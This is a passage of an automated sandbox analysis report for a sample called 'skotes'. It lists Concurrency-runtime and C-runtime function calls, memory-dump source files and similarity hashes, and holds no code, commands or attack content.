                                                                                                                                                                                                                                                • Part of subcall function 00BF5CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00BF5CF8
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00BF792A
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00BF7936
                                                                                                                                                                                                                                                • Part of subcall function 00BF5CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00BF5D70
                                                                                                                                                                                                                                                • Part of subcall function 00BF5CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00BF5D7E
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00BF7982
                                                                                                                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 00BF79A3
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00BF79AB
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00BF79BD
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00BF79ED
                                                                                                                                                                                                                                                • Part of subcall function 00BF691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00BF6942
                                                                                                                                                                                                                                                • Part of subcall function 00BF691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00BF6965
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1475861073-0
                                                                                                                                                                                                                                              • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                                                                              • Instruction ID: d575ceed6e5377f16159249770c446e7bd372a75b30eff2ddf50e08083dcdc17
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF31E130A88259BACF16AB7848927FEBBF5DF45300F0481E9DA86D7242DE64494E87D1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C04877
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00C0487F
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C04908
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00C04933
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C04988
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                              • Opcode ID: b4465cf76d0d83387e2345994a6b941295776deeba9da20c5c1d0d3cfdf851ee
                                                                                                                                                                                                                                              • Instruction ID: 44deb057c780a1ae3ad513a9867d3b6aa677fc34ba6d3fb9064a0c3fcced4090
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4465cf76d0d83387e2345994a6b941295776deeba9da20c5c1d0d3cfdf851ee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA41E574A00209EFCF14DF68C884A9FBBB8AF05314F14C165EA289B3E2D7319A55DF91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00BFDD91
                                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00BFDDAE
                                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00BFDE14
                                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00BFDE29
                                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00BFDE3B
                                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 00BFDE4B
                                                                                                                                                                                                                                              • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00BFDE74
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2885714658-0
                                                                                                                                                                                                                                              • Opcode ID: 3f5618c1bedce189ccfc7e38993438beacab193cc9080c74a73febf4c2a2753c
                                                                                                                                                                                                                                              • Instruction ID: ebb2451c859cbe7fbeb6b12307e7c5fb2a8d0209955043c8dfcf613333e2839f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f5618c1bedce189ccfc7e38993438beacab193cc9080c74a73febf4c2a2753c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA41AB30A0424C9ACF15EBA484957BC7BE6AF11304F1444F9EA516B2D3DB758E0DCB62
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00BFE7D7
                                                                                                                                                                                                                                                • Part of subcall function 00BFE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00BFE577
                                                                                                                                                                                                                                                • Part of subcall function 00BFE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00BFE599
                                                                                                                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00BFE854
                                                                                                                                                                                                                                              • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00BFE860
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00BFE86F
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00BFE879
                                                                                                                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 00BFE8AD
                                                                                                                                                                                                                                              • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00BFE8B5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
